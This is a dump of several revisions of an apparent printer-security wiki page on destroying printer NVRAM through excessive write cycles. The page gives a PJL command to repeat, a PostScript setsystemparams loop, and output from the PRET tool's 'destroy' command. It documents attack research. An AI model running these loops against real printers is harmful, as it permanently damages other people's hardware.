destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evaluation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 41</ref>. Some gave EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction, however, is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''Testing for the Attack''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Required Privileges''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a long period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream for nearly a day. <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref> However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic. <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref> == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate would be a PostScript password, as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop, as show below, which can lead to a large number of NVRAM write cycles per second if the printer's hardware is implemented to write values directly instead of caching them: <syntaxhighlight lang=postscript> /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop </syntaxhighlight> Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EEPROM write cycles on early LaserWriter printers.<ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref> d237341a78ed6e2e755e873ccb752eaeb5e8e855 333 196 2017-01-31T15:50:03Z Admin 1 wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets ‘flash chips would only sustain about 1000-2000 cycles of re-writing’ <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: <syntaxhighlight lang=postscript> /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop </syntaxhighlight> Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- f71b8298e91a979e38ec92dd01c9426dfaebbc72 196 141 2017-01-23T12:10:15Z Admin 1 wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: <syntaxhighlight lang=postscript> /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop </syntaxhighlight> Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 44bd9e27d5e713df17c12835906f613f6ede5bb7 141 138 2017-01-15T14:39:36Z Admin 1 wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: <syntaxhighlight lang=postscript> /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop </syntaxhighlight> Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 000f1bc64b667fcb99c02cb95f6c8fca03cc1330 138 131 2017-01-14T20:02:56Z Admin 1 wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: <syntaxhighlight lang=postscript> /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop </syntaxhighlight> Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 78f8fce419424619e258f71b6488401deb1d3daa 131 125 2017-01-14T19:59:49Z Admin 1 /* PostScript */ wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: <syntaxhighlight lang=postscript> /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop </syntaxhighlight> Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 608b383a7d184fd36f2fc28ca186f23672b5f4bd 125 113 2017-01-14T19:55:40Z Admin 1 /* PostScript */ wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: <syntaxhighlight lang=postscript> /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop </syntaxhighlight> Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 20bda1d74c8bf556554f6207177408084089ffc3 113 112 2017-01-14T17:42:28Z Admin 1 wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy 